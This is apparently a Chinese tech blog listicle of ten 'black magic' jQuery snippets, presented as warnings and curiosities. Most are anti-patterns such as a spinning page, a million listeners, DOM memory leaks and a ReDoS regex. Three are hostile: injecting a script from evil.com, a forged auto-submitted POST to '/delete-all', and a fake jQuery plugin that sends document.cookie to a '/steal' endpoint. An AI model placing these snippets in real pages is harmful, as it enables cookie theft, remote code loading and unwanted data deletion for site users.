邪修 jQuery 10 连击｜全站旋转木马、百万监听器、内存黑洞

邪修 jQuery ，10 段“千万别上生产”的黑魔法代码
——仅供技术猎奇，切勿真用！

⚠️ 每条都可能：性能崩、内存漏、SEO 死、维护成本 ∞

面试炫技 OK，项目敢用就等死！

1️⃣ 一行全站旋转木马

$('html').append('<style>html{animation:spin 10s linear infinite}@keyframes spin{to{transform:rotate(360deg)}}</style>');

整个页面像陀螺，用户 3 秒晕厥。

2️⃣ 无限事件监听器

for (let i = 0; i < 1e6; i++) $(window).on('resize', () => {});

百万监听器，Chrome 直接卡爆。

3️⃣ 动态创建木马脚本

$('body').append(`<script src="https://evil.com/x.js"></script>`);

运行时插外链，CSP 形同虚设。

4️⃣ 隐式全局变量泄漏

$('input').each(function(){ evilVar = $(this).val(); });

未声明变量污染 window，调试器原地迷路。

5️⃣ 链式地狱 + 隐式回调

$('#btn').click(() => $('#btn').click(() => $('#btn').click(...)));

无限套娃回调，栈溢出分分钟。

6️⃣ 伪造表单提交

$('<form method="post" action="/delete-all"><input name="confirm" value="1"></form>').submit();

无用户交互直接 POST，CSRF 一键触发。

7️⃣ 隐藏元素占满内存

setInterval(() => $('body').append('<div style="display:none">💀</div>'), 1);

DOM 节点秒级增长，内存泄漏到爆炸。

8️⃣ 正则回溯炸弹

/^(a+)+$/.test('a'.repeat(30)); // 指数级回溯

30 个 a 让 Chrome 直接卡死（ReDoS）。

9️⃣ 动态样式无限循环

setInterval(() => $('body').css('filter', 'hue-rotate(' + Math.random() * 360 + 'deg)'), 16);

16 ms 一帧，GPU 100%，风扇起飞。

🔟 利用 $.fn 扩展木马

$.fn.evil = function () {
    $.get('/steal?cookie=' + encodeURIComponent(document.cookie));
    return this;
};
$('body').evil();

伪装成 jQuery 插件，一键窃取 Cookie。

邪修口诀

“链式当迷宫，事件当炸弹；

DOM 当黑洞，性能当烟花。”

PS

想要正经学习 jQuery ，从编程狮的《jQuery 入门课程》开始！